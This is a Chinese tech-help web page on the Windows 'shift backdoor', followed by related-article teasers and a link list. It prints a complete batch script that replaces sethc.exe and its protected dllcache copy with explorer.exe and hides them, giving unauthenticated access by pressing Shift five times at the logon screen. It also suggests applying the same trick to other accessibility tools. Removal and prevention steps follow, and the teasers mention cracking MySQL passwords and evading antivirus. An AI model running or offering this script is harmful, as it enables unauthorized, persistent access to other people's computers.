shift后门的原理是什么?如何清除shift后门?
在cmd下输入以下命令...
下面再打开记事本把底下的代码粘贴进去。
复制代码
代码如下:
@echo off
cls
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo Shift后门
echo.sproink
@copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
@copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
@attrib c:\windows\system32\sethc.exe +h
@attrib c:\windows\system32\dllcache\sethc.exe +h
echo 使用方法:本文件执行完毕后,
echo 在终端界面按Shift 5次即可登陆系统!
echo.
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
echo 完成百分之 50
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
echo 完成百分之 80
attrib c:\windows\system32\sethc.exe +h
echo 完成百分之 90
attrib c:\windows\system32\dllcache\sethc.exe +h
echo 完成百分之 100
cls
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo 后门安装完毕!
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo. & pause
exit
其实原理很简单,就是利用了explorer.exe 这个资源管理器进程替换调用的shift 默认启动程序,然后还覆盖了windows的文件保护原文件(防止文件保护系统检测到文件修改,会还原这些原来的程序,造成copy文件失去作用),当调用shift是其实调用的真正程序是桌面进程。Lyon: 同理,你也可以利用此方法替换屏幕键盘及放大镜和组合键:win+u,其它自己可以拓展思路^_^
下面介绍如何清除此后门...
打开控制面板--辅助功能选项--粘滞键--设置--去掉使用快捷键的勾
还有要改下copy.exe的权限,不过在这里推荐大家把c盘所有的程序都 改下,只有administrator才能访问
shift后门的预防解决办法:预防很简单的,连敲5次shift,然后在弹出的设置里面取消连滞键
已经中了的话
attrib c:\windows\system32\sethc.exe -h
attrib c:\windows\system32\dllcache\sethc.exe -h
拷贝新的 c:\windows\system32\sethc.exe 文件到 c:\windows\system32\目录下;拷贝新的c:\windows\system32\dllcache\sethc.exe到c:\windows\system32\dllcache\目录下
还有就是在c:\windows\system32及c:\windows\system32\dllcache\下找到sethc.exe 禁止所有用户权限或拒绝访问等,也可:)建议利用前者恢复。。。
收工!
什么是openvpn漏洞?openvpn漏洞的危害
OpenVPN桌面客户端爆CSRF漏洞(可远程执行命令)受影响版本:windows版本的OpenVPN Access Server "Desktop Client " app。版本号为1 5 6(漏洞发现时的最新版)及以前的版本。OpenVPN Connect,Private Tunne
详情2018-01-03 13:38:05责编:llp 来源:驱动管家互联网有哪些恶意软件?互联网十大恶意软件
想要从所有的安全厂商那里得到所有的数据并分析恶意软件感染的难度无异于“上青天”。不过总会有安全企业会通过自己的数据来分析当前网络威胁的数量和类型,以及恶意软件传播的高峰期或谷底期。安全厂商Check Po
详情2018-01-14 10:34:55责编:llp 来源:驱动管家关闭445端口的方法 怎么关闭445端口?
近日有多个高校发布了关于连接校园网的电脑大面积中勒索病毒的消息,这种病毒致使许多高校毕业生的毕业论文(设计)被锁。受害机器的磁盘文件会被篡改为相应的后缀,图片、文档、视频、压缩包等各类资料都无法正常打
详情2018-01-07 14:19:55责编:llp 来源:驱动管家这里有暴力破解php mysql密码的步骤
传到WebShell上去暴力破解本机的MySql数据库Root或其它用户的密码,因为是破解本机,所以速度奇快无比,貌似还有点效果,这个以前有人发过,这个是我改过的。已知有一处Bug,不清楚为何,密码数量少的时候,准确
详情2018-01-14 21:18:45责编:llp 来源:驱动管家什么是rootkit病毒?rootkit病毒的类型及对应措施
Rootkits病毒主要分为两大类:第一种是进程注入式Rootkits,另一种是驱动级Rootkits。第一种Rootkits技术通常通过释放动态链接库(DLL)文件,并将它们注入到可执行文件及系统服务进程中运行,阻止操作系统及应用
详情2018-01-13 11:34:20责编:llp 来源:驱动管家什么是后门程序?后门程序有哪些分类?
后门程序又称特洛伊木马,其用途在于潜伏在电脑中,从事搜集信息或便于黑客进入的动作。后程序和电脑病毒最大的差别,在于后门程序不一定有自我复制的动作,也就是后门程序不一定会“感染”其他电脑。后门是一种
详情2018-01-08 13:34:17责编:llp 来源:驱动管家手机软件排行榜是真的吗?手机软件排行是恶意刷榜?
随着移动端应用市场数量爆炸式增长,App推广和曝光率也越来越难。哪里有需求哪里就有生财之道,自然,App刷榜也就形成了一条产业链,它能够在短期内大幅提高下载量和用户量,进而提高应用的曝光率。当你打开应用
详情2018-01-03 15:50:38责编:llp 来源:驱动管家openssl漏洞有哪些?openssl漏洞导致信息泄露
小编带来了openssl漏洞详情,想知道openssl重大安全漏洞具体是什么情况吗?会不会威胁到我们的财产安全呢?下文将会为大家详细介绍,网友们可以来了解一下。昨日,OpenSSL(为网络通信提供安全及数据完整性的一种安
详情2018-01-08 13:56:46责编:llp 来源:驱动管家恶意网站是什么网站?恶意网站的相关知识
当我们在访问一些网站是会弹出一些提示,有时候QQ管家、金山毒霸是经常弹出访问提示,不注意就会扣掉很多钱,那么真正的恶意网站又是怎么一回事,又有多少人彻底的明白呢?一起来看看吧。| 前言恶意网站在大家平
详情2018-01-12 15:27:06责编:llp 来源:驱动管家木马免杀怎么改特征码?木马免杀改特征码的经验分享
木马免杀,在国内应该起源于05年吧 从那时单一特征码到现在复合特征码,杀毒软件从无主动防御到有主动防御 免杀技术越来越难 但是万变不离其宗--改特征码 到现在一些辅助软件的行为查杀 以下讲解都是以远程控制软件
详情2018-01-03 10:00:32责编:llp 来源:驱动管家
- 在蜜芽上买的东西不想要了怎么退货?蜜芽退货流程怎么弄?
- 新浪微博登陆异常是怎么回事?怎么解决新浪微博账号异常问题?
- 笔记本电脑光驱的寿命延长的十大法则是什么
- 鼠标滚轮失灵可以自己拆解维修吗?按照以下步骤就行了
- 苹果电脑怎么快速截取icon图标
- 教你在win7系统下用最快捷的办法隐藏图标
- 拍照手机排行 2013年十款最佳拍照手机
- 魅族mx4的剪卡教程 魅族mx4怎么剪卡?
- 电脑启动项有哪些?为啥电脑启动项导致电脑启动慢?
- 网络电视是什么?网络电视是智能电视吗?
- mysql更改密码的几种方法 mysql密码清空方法
- 网络信息安全 各种系统常见的安全问题
- foxmail邮箱可以发超链接图片的邮件吗?foxmail邮箱怎么发超链接邮件?
- 搜狗浏览器网页为什么没声音?搜狗浏览器网页没声音怎么解决?
- 鼠标灵敏度怎么调?调节鼠标灵敏度的方法
- 鼠标左键不灵敏的时候自己如何动手维修呢
- 谷歌浏览器遇到扩展打不开的情况可以这样做
- 红旗linux使用无线上网卡上网的时候怎么才更安全
- 华为手机的nfc怎么用?nfc功能的使用方法
- 你知道红米note参数吗?红米note和中兴v5哪个好?